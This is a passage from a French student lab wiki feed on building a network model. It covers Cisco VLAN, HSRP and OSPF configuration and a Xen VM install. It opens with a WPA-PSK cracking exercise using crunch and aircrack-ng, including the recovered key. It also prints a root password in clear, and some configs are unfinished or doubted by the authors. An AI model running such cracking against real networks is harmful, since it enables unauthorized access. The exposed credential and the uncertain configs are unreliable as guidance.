Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51252</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51252"/>
				<updated>2019-11-28T09:46:36Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
